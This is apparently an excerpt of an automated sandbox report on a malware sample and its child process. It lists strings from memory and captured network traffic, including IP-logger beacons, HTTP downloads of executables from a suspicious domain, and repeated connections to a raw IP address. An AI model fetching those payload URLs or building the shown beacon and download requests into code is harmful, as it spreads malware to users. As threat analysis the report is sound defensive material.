                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                        Source: mopnns.exe, 00000004.00000002.469278293.0000000002612000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                        Source: mopnns.exe, 00000004.00000002.469216086.00000000025F2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                        Source: mopnns.exe, 00000004.00000002.469190974.00000000025E2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                        Source: mopnns.exe, 00000004.00000002.469190974.00000000025E2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                        Source: mopnns.exe, 00000004.00000002.469278293.0000000002612000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                        Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: VYeSXonMT1.exe, VYeSXonMT1.exe, 00000000.00000002.406063064.0000000003990000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405371643.0000000000400000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000003.374805242.0000000003A60000.00000004.00000001.sdmpString found in binary or memory: https://autohotkey.com
                        Source: VYeSXonMT1.exe, 00000000.00000002.406063064.0000000003990000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405371643.0000000000400000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000003.374805242.0000000003A60000.00000004.00000001.sdmpString found in binary or memory: https://autohotkey.comCould
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405960317.000000000209C000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
                        Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1mhvg7
                        Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1mhvg7e
                        Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405979287.00000000020B5000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1mjvg7
                        Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/?Oq
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/S
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/a
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknown | DNS traffic detected: queries for: iplogger.org
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004545D0 __wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,InternetReadFileExA,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileW | 0_2_004545D0
                        Source: global traffic | HTTP traffic detected: GET /1mjvg7 HTTP/1.1
                            Cache-Control: no-cache, no-store
                            Connection: Keep-Alive
                            Pragma: no-cache
                            Accept: */*
                            If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
                            User-Agent: ( Windows 10 Enterprise | x64 | Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz | Windows Defender | Chrome )
                            Host: iplogger.org
                        Source: global traffic | HTTP traffic detected: GET /1mhvg7 HTTP/1.1
                            Cache-Control: no-cache, no-store
                            Connection: Keep-Alive
                            Pragma: no-cache
                            Accept: */*
                            If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
                            User-Agent: ( Windows 10 Enterprise | x64 | Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz | Windows Defender | Chrome )
                            Host: iplogger.org
                        Source: global traffic | HTTP traffic detected: GET /jollion/apines.exe HTTP/1.1
                            User-Agent: AutoHotkey
                            Host: blairwitch.top
                            Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /work/mix.exe HTTP/1.1
                            User-Agent: AutoHotkey
                            Host: blairwitch.top
                            Cache-Control: no-cache
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
                        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                            Date: Thu, 25 Nov 2021 17:23:39 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 276
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 6c 61 69 72 77 69 74 63 68 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at blairwitch.top Port 80</address></body></html>
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
